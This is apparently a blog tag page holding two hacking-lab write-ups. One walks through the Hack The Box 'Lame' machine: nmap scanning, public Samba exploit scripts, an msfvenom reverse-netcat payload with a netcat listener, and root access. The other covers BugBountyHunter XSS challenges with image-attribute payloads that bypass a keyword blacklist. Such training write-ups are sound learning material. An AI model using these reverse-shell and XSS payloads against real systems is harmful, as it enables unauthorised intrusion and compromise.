Skip to content

Tag: Writeups

HTB Writeup: Lame w/o Metasploit

Published by Bobby Lin on April 4, 2021

Overview

  • Run two nmap scans to determine the open ports, services and OS.
  • Based on the discovered information, search for possible exploits.
  • Look for exploits scripts for each service versions for gaining root.
  • Test the exploits to see if the discovered services are exploitable.

Recon

nmap options

  • -O <Enable OS detection
  • -sC <Run default scripts>
  • -sV <Probe open ports to determine service/version info>
  • -oA <Output to all format>
  • -p- <Scan all ports>

Quick scan

sudo nmap -sC -sV -O -oA quickscan 10.10.10.3

Full scan

sudo nmap -p- -sC -sV -O -oA fullscan 10.10.10.3

We can see there is an additional service that is not discovered by the quick scan


Enumeration

We discovered five attack surfaces from our port scanning results. They are:

  1. ftp (port:21, version: vsftpd 2.3.4)
  2. ssh (port:22, version:OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0))
  3. netbios-ssn (port:139, version:Samba smbd 3.X – 4.X (workgroup: WORKGROUP))
  4. netbios-ssn (port:445, version:Samba smbd 3.0.20-Debian (workgroup: WORKGROUP))
  5. distccd (port:3632, version: distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

FTP

One convenient way of checking if the service version has an exploit is to use the searchsploit tool in Kali Linux. Here we can see that this particular FTP version has a reported exploit.

We can try googling for a python exploit. I found this in github:

https://github.com/ahervias77/vsftpd-2.3.4-exploit/blob/master/vsftpd_234_exploit.py

However, when I executed the script, the exploit was not successful. The script was stuck and did not progress further.

SSH

There were a few user enumeration attack on SSH. This usually takes time and we can come back if the other services are not exploitable.

Samba

This particular version of Samba has exploit available.

I found an exploit script in Python: https://github.com/macha97/exploit-smb-3.0.20/blob/master/exploit-smb-3.0.20.py

You will need to update the script by following the steps below:

  • Get your LHOST:ip addr|grep tun0
  • Generate the reverse netcat buffer payload:msfvenom -p cmd/unix/reverse_netcat LHOST=<Your LHOST> LPORT=<Specify any port> -f python
  • Replace line 8 to 15 with the generated payload from msfvenom.
  • Update victim IP to the box IP address.
  • Remove line 1.
  • Install pysmb: pip install pysmb

Exploit

Samba

  • Start netcat: nc -nlvp 1337
  • Run the exploit: python3 exploit-smb-3.0.20.py

Now can run command now to get the FLAG in as the root user.


Reflections on the lab

This was the first lab that I have completed in Hack The Box (HTB). I learned a few things here:

  • This is abit different from purely web application hacking that I am more familiar with. You need to perform recon and systematically enumerate the services.
  • You need to know how to look for exploits, modifying and debugging the scripts that you found online.
  • You need to know some tools such as msfvenom, netcat and python etc.
  • Also port scanning needs to be thorough in order to discover more services that the quick scan does not find.

Writeups on Free Challenges in BugBountyHunter

Published by Bobby Lin on December 10, 2020

In this post, I will share some writeups on the free challenges in BugBountyHunter platform. I encourage everyone to check out the site https://www.bugbountyhunter.com/.

Cross-Site Scripting in Image Tag

https://www.bugbountyhunter.com/challenge?id=2

How does the feature works? If you select the dropdown option, the image will be rendered with special effects using CSS. In the img tag, we can see the selected option value will appear in class.

What could go wrong? The POST request looks suspicious.

Request

There is no server side validation of the imageClass value. You can send any value and it will be reflected in the response.

Response

We can try sending a few payloads to test for XSS issue. First, we can modify the imageClass value to imageClass=helloworld" onload="alert(1)". The response return a class="1" in the tag. We can try imageClass=helloworld" onclick="alert(1)". The response also return class="1" in the tag.

It seems like there is some blacklisting of some keywords such as onload or onclick etc. Hence we need to find the event handler method that is not blacklisted. Fortunately, this payload was not blocked: img2" onpointerup="alert('xss').

When we click on the image in the browser, the malicious script is executed.